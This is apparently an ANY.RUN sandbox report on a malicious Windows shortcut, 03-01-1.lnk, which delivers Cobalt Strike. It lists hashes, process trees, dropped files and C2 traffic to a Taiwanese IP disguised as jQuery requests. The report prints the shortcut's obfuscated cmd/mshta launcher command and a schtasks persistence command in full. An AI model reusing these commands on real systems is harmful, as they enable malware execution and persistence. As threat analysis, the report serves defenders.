analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

03-01-1.lnk

Full analysis: https://app.any.run/tasks/1801ba3e-f3f8-4927-b6e3-3a6ec51d2418
Verdict: Malicious activity
Threats:

Cobalt Strike is a legitimate penetration software toolkit developed by Forta. But its cracked versions are widely adopted by bad actors, who use it as a C2 system of choice for targeted attacks.

Malware Trends Tracker     >>>
Analysis date: March 04, 2020, 15:04:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
cobaltstrike
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=1, Archive, ctime=Mon Jul 13 22:22:09 2009, mtime=Mon Jul 13 22:22:09 2009, atime=Tue Jul 14 00:14:15 2009, length=301568, window=hidenormalshowminimized
MD5:

0F794D6C6646A260558E9D638AE060C9

SHA1:

2D6FD5FAF485B7FEAD2570FE1E610B34B371B60B

SHA256:

A095924F6F0ED69914A36A8DBCD4F03D5040F61A3C107EDB73A4DD7E0C18AD4B

SSDEEP:

6144:oj3opkA8iSyYGJzPi3m8WKHkdFKPjiGqP:oKJzP0lW77P

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 3.exe (PID: 2892)
      • 3.exe (PID: 2936)
      • tencentsoso.exe (PID: 3032)

    • Uses Task Scheduler to run other applications

      • 3.exe (PID: 2936)
      • 3.exe (PID: 2892)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 2896)
      • schtasks.exe (PID: 2720)

    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 3548)
      • tencentsoso.exe (PID: 3032)

    • Connects to CnC server

      • tencentsoso.exe (PID: 3032)

    • COBALTSTRIKE was detected

      • tencentsoso.exe (PID: 3032)

  • SUSPICIOUS

    • Executed via WMI

      • 3.exe (PID: 2892)
      • 3.exe (PID: 2936)
      • cmd.exe (PID: 2820)
      • cmd.exe (PID: 2880)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 304)

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 940)
      • mshta.exe (PID: 2556)
      • 3.exe (PID: 2892)
      • 3.exe (PID: 2936)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 304)

    • Starts Microsoft Office Application

      • cmd.exe (PID: 2880)
      • cmd.exe (PID: 2820)

    • Executed via Task Scheduler

      • tencentsoso.exe (PID: 3032)

    • Reads Internet Cache Settings

      • tencentsoso.exe (PID: 3032)

  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2556)
      • mshta.exe (PID: 940)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2876)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2876)
      • WINWORD.EXE (PID: 3988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: cia-at28--planc
IconFileName: %SystemRoot%\system32\SHELL32.dll
CommandLineArguments: /c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f "delims==" %i in ('dir "%x\03-01-1.lnk" /s /b') do start %TEMP:~-2,1%%windir:~-1,1%h%TEMP:~-13,1%%TEMP:~-7,1%.exe "%i"
RelativePath: ..\..\..\..\Windows\System32\cmd.exe
Description: 03-01-1.lnk
LocalBasePath: C:\Windows\System32\cmd.exe
VolumeLabel: -
DriveType: Fixed Disk
TargetFileDOSName: cmd.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 1
TargetFileSize: 301568
ModifyDate: 2009:07:14 03:14:15+02:00
AccessDate: 2009:07:14 01:22:09+02:00
CreateDate: 2009:07:14 01:22:09+02:00
FileAttributes: Archive
Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
15
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs mshta.exe cmd.exe no specs mshta.exe 3.exe 3.exe cmd.exe no specs cmd.exe no specs schtasks.exe no specs schtasks.exe no specs searchprotocolhost.exe no specs winword.exe no specs winword.exe no specs #COBALTSTRIKE tencentsoso.exe

Process information

PID
CMD
Path
Indicators
Parent process
304"C:\Windows\System32\cmd.exe" /c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (C:\Users\admin\AppData\Local\Temp=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f "delims==" %i in ('dir "%x\03-01-1.lnk" /s /b') do start %TEMP:~-2,1%%windir:~-1,1%h%TEMP:~-13,1%%TEMP:~-7,1%.exe "%i"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1696C:\Windows\system32\cmd.exe /c dir "C:\Users\admin\AppData\Local\Temp\03-01-1.lnk" /s /bC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
940mshta.exe "C:\Users\admin\AppData\Local\Temp\03-01-1.lnk"C:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3452C:\Windows\system32\cmd.exe /c dir "C:\Users\admin\AppData\Local\Temp\03-01-1.lnk" /s /bC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2556mshta.exe "C:\Users\admin\AppData\Local\Temp\03-01-1.lnk"C:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2892C:\Users\admin\AppData\Local\Temp\3.exeC:\Users\admin\AppData\Local\Temp\3.exe
wmiprvse.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2936C:\Users\admin\AppData\Local\Temp\3.exeC:\Users\admin\AppData\Local\Temp\3.exe
wmiprvse.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2820cmd.exe /c "C:\Users\admin\AppData\Local\Temp\03-01-1.docx"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2880cmd.exe /c "C:\Users\admin\AppData\Local\Temp\03-01-1.docx"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2720"C:\Windows\System32\schtasks.exe" /F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exeC:\Windows\System32\schtasks.exe3.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 379
Read events
2 338
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
4
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
2876WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7680.tmp.cvr
MD5:
SHA256:
3988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR7681.tmp.cvr
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{82618090-9AC0-45AA-91ED-57B9A2B7959C}.tmp
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{63088BF3-E96C-47CA-BB3D-9CE5D62E75EE}.tmp
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BB169BFA-65D2-4919-87A1-530E882E6B6C}.tmp
MD5:
SHA256:
3988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRC0000.tmp
MD5:
SHA256:
3988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9947260D-AB6D-4F1F-AD43-04E69ABFBA82}.tmp
MD5:
SHA256:
2556mshta.exeC:\Users\admin\AppData\Local\Temp\03-01-1.docxdocument
MD5:7F0A1BDDE14EA1F3085B43BDADCFB146
SHA256:B910C03672C25890D3BA5E384693984AB8FB9AB4421202F60F0D1895B95B997E
29363.exeC:\Users\Public\Music\SideBar.dllexecutable
MD5:7C1B07142FC73CF3157435BA740FF500
SHA256:D422FEB0D64230A3492BEA1DD0D7525038792D7D703FD9FE10F0D5F1AA5313A3
29363.exeC:\Users\Public\Music\CIA.AT28binary
MD5:D462508D370792941EF001E1C1BFAC54
SHA256:064C5C762DEF587D178C7DFC94F9C703515A0716DD0CDAF5BE379960729389ED
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3032
tencentsoso.exe
GET
200
123.51.185.75:80
http://code.jquery.com/jquery-3.3.1.min.js
TW
text
5.41 Kb
malicious
3032
tencentsoso.exe
GET
200
123.51.185.75:80
http://code.jquery.com/jquery-3.3.1.min.js
TW
text
5.41 Kb
malicious
3032
tencentsoso.exe
GET
200
123.51.185.75:80
http://code.jquery.com/jquery-3.3.1.min.js
TW
text
5.41 Kb
malicious
3032
tencentsoso.exe
GET
200
123.51.185.75:80
http://code.jquery.com/jquery-3.3.1.slim.min.js
TW
s
214 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3032
tencentsoso.exe
123.51.185.75:80
New Century InfoComm Tech Co., Ltd.
TW
malicious

DNS requests

No data

Threats

Found threats are available for the paid subscriptions
3 ETPRO signatures available at the full report
Process
Message
tencentsoso.exe
CIA-Don't analyze!!AT28!!
tencentsoso.exe
C:\Users\Public\Music\tencentsoso.exe
tencentsoso.exe
C:\Users\Public\Music\
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
03-01-1.lnk